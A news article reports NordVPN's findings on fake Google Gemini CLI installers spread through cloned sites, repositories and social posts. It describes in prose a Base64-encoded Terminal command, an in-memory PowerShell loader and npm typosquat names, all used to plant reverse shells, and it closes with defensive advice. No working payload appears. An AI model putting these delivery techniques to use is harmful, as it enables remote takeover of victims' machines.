Fake Google Gemini CLI Tools Install Remote Shells
NordVPN warns attackers use cloned sites, repos and social posts to distribute fake Google Gemini CLI installers that install reverse shells and give full remote control of Mac and Windows machines.
NordVPN researchers reported active campaigns impersonating the official Google Gemini command-line interface. Attackers create cloned websites, fake repositories and deceptive social posts offering an apparent early or unofficial version of the Gemini CLI. Instead of legitimate software, the downloads install reverse shells that open an unrestricted remote connection to the compromised device.
On macOS the scam uses a cloned Gemini CLI page that instructs users to paste a command into Terminal. The command is Base64-encoded. When decoded, it downloads a script from a remote server and runs it with the highest available privileges. With those privileges an operator can read, modify or delete files, install additional malware, or use the compromised Mac to reach corporate networks the device is connected to.
The Windows variant uses a PowerShell delivery that mimics an installer. A script with benign-looking variable names such as $Install=’GeminiCLI’ contacts a remote server and executes code directly in memory. Because the attack runs in memory rather than writing files to disk, it can evade antivirus tools that rely on scanning files for known signatures.
NordVPN’s team also identified a typosquatting attempt targeting the npm ecosystem. Attackers prepared package names such as gemini/cli and gemini-cli to mimic the official google/gemini-cli package, taking advantage of developers who omit the organization prefix when installing packages. At the time of analysis the fake package had not appeared in the npm registry, but the preparation suggests a near-term risk.
NordVPN advised downloading the Gemini CLI only from the official Google repository and avoiding installers offered through unofficial sites, forum posts or social messages. The firm recommended never running terminal or PowerShell commands copied from a webpage unless you wrote them or can verify exactly what they do. Developers should verify full package names, including organization prefixes, before installing from registries.
The researchers urged the use of security software that includes behavioral detection rather than relying solely on file-based scanning, because fileless attacks are designed to bypass traditional antivirus products.
Domininkas Virbickas, product director at NordVPN, warned: “AI tools are generating huge interest right now, and attackers are moving fast to exploit that.” NordVPN’s report noted that the delivered payloads grant full remote access to a victim’s machine.
Google did not respond to requests for comment by the time of publication.
